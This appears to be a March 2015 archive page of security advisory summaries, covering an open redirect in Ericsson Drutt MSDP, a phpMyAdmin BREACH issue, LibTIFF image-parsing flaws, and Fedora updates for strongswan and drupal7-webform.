Ericsson Drutt MSDP (3PI Manager) versions 4, 5, and 6 suffer from an open redirection vulnerability.
Monthly Archives: March 2015
Red Hat Security Advisory 2015-0765-01
Red Hat Security Advisory 2015-0765-01 – Red Hat JBoss Data Virtualization is a lean data integration solution that provides easy, real-time, and unified data access across disparate sources to multiple applications and users. JBoss Data Virtualization makes data spread across physically distinct systems-such as multiple databases, XML files, and even Hadoop systems-appear as a set of tables in a local database. This roll up patch serves as a cumulative upgrade for Red Hat JBoss Data Virtualization 6.0.0. It includes various bug fixes, which are listed in the README file included with the patch files.
Mandriva Linux Security Advisory 2015-186
Mandriva Linux Security Advisory 2015-186 – libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests. This upgrade provides the latest phpmyadmin version to address this vulnerability. Additionally, the phpseclib package has been upgraded to the 0.3.10 version.
Debian Security Advisory 3210-1
Debian Linux Security Advisory 3210-1 – Multiple vulnerabilities were discovered in the dissectors/parsers for WCP, pcapng and TNEF, which could result in denial of service.
Ubuntu Security Notice USN-2553-1
Ubuntu Security Notice 2553-1 – William Robinet discovered that LibTIFF incorrectly handled certain malformed images. If a user or automated system were tricked into opening a specially crafted image, a remote attacker could crash the application, leading to a denial of service, or possibly execute arbitrary code with user privileges. Paris Zoumpouloglou discovered that LibTIFF incorrectly handled certain malformed BMP images. If a user or automated system were tricked into opening a specially crafted BMP image, a remote attacker could crash the application, leading to a denial of service. Various other issues were also addressed.
Java.com Cross Site Scripting
Java.com suffered from multiple cross site scripting vulnerabilities.
Fedora EPEL 7 Security Update: strongswan-5.3.0-1.el7
Resolved Bugs
1178957 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload [epel-all]
1173064 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload<br
New upstream release 5.3.0.
Fixes CVE-2014-9221 denial-of-service vulnerability.
Fedora EPEL 6 Security Update: drupal7-webform-4.7-1.el6
Resolved Bugs
1206400 – drupal7-webform-4.7 is available
1205122 – drupal webform: multiple XSS flaws
1199067 – drupal7-webform-4.5 is available
1150458 – drupal7-webform-4.2 is available
1205126 – drupal7-webform: drupal webform: multiple XSS flaws [epel-6]
1204540 – drupal7-webform-4.6 is available
1193356 – drupal7-webform-4.3 is available<br
– Update to 4.7
– Release notes can be found at https://www.drupal.org/node/2460229
– Security fix for drupal7-webform module
– Upstream release notes: https://www.drupal.org/node/2457219
– Release notes can be found at https://www.drupal.org/node/2454063
– Update to 4.3
– Release notes can be found at https://www.drupal.org/node/2427257
– Update to 4.2
– Release notes can be found at https://www.drupal.org/node/2381793
Fedora EPEL 6 Security Update: strongswan-5.3.0-1.el6
Resolved Bugs
1205617 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload [epel-all]<br
New upstream release 5.3.0.